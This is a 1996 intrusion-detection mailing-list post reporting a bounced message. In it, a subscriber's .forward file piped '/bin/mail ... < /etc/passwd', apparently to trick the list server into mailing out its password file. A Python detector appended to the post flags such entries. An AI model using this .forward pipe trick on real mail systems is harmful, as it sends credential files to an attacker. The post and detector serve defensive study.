IDS Mailing List detects intrusion attempt ?

Justin J. Lister (ruf@osiris.cs.uow.edu.au)
Fri, 15 Mar 1996 13:56:04 +1100 (EST)

G'day,

        I don't know if this was a deliberate attempt to be amusing 
(definitely too early for April Fools) but the owner-ids received an
interesting Returned: mail from MAILER-DAEMON@pollux.cs.uga.edu.

Could be a first 'Intrusion Detection List catches attempted intrusion'
(hey Steve do you have an intrusion penetration rule for this scenario).

The mail was in response to a subscription request to IDS (attempting to
deliver the list introduction message).

The Headers from MAILER-DAEMON:

Date: Thu, 14 Mar 1996 21:20:34 -0500 (EST)
From: Mail Delivery Subsystem <MAILER-DAEMON@pollux.cs.uga.edu>
Subject: Returned mail: /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for mailing to files
To: <owner-ids@uow.edu.au>

The original message was received at Thu, 14 Mar 1996 21:20:30 -0500 (EST)
from wyrm.its.uow.edu.au [130.130.68.1]

   ----- The following addresses have delivery notifications -----
|/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd  (unrecoverable error)
    (expanded from: <lodwick@pollux.cs.uga.edu>)

   ----- Transcript of session follows -----
553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
 /etc/passwd... Unbalanced '<'
550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
 /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for ma
iling to files

-- 
+---------------------+--------------------------------------------------+
|  ____       ___     | Justin Lister                 ruf@cs.uow.edu.au  |
| |    \\   /\ __\    |     Center for Computer Security Research        |
| | |) / \_/ / |_     | Dept. Computer Science       voice: 61-42-214-327|
| |  _ \\   /| _/     | University of Wollongong       fax: 61-42-214-329|
| |_/ \/ \_/ |_| (tm) | LiNuX- iNTEL justification. mobile: 61-0411405217|
|                     |     Computer Security a utopian dream...         |
+---------------------+--------------------------------------------------+
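
A rule of the kind the post asks about, as an added example that is not part of the original message: it rejoins the hard-wrapped transcript lines of the bounce above and flags any `.forward` program entry that names a password file. The function names and the `SENSITIVE` list are assumptions made for this example.

```python
import re

# Paths whose appearance in a .forward program entry deserves a look.
# Assumption for this example; extend per site.
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/master.passwd"}

# Transcript line shape: <code> <path>/.forward: line <n>: |<cmd>... <reason>
ENTRY = re.compile(
    r"^(?P<code>\d{3}) (?P<path>\S*/\.forward): line (?P<line>\d+): "
    r"(?P<cmd>\|.*?)\.\.\. (?P<reason>.*)$"
)

# Transcript lines copied from the bounce quoted in the message above.
SAMPLE = """\
553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
 /etc/passwd... Unbalanced '<'
550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
 /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for ma
iling to files
"""

def unwrap(transcript):
    """Rejoin hard-wrapped lines: anything that does not start with a
    three-digit reply code continues the previous line."""
    out = []
    for raw in transcript.splitlines():
        if out and not re.match(r"\d{3} ", raw):
            out[-1] += raw          # continuation of a wrapped line
        else:
            out.append(raw)
    return out

def forward_pipe_findings(transcript):
    """One finding per distinct .forward program entry naming a sensitive file."""
    findings = {}
    for line in unwrap(transcript):
        m = ENTRY.match(line)
        if not m:
            continue
        cmd = m["cmd"]
        files = sorted(SENSITIVE.intersection(cmd.split()))
        if not files:
            continue
        redirected = bool(SENSITIVE.intersection(re.findall(r"<\s*(\S+)", cmd)))
        f = findings.setdefault((m["path"], m["line"], cmd), {
            "path": m["path"], "line": int(m["line"]), "command": cmd,
            "files": files, "input_redirect": redirected, "replies": []})
        f["replies"].append((m["code"], m["reason"]))
    return list(findings.values())
```

Both reply lines in the bounce refer to the same `.forward` entry, so the sample yields a single finding that carries the 553 and 550 replies together.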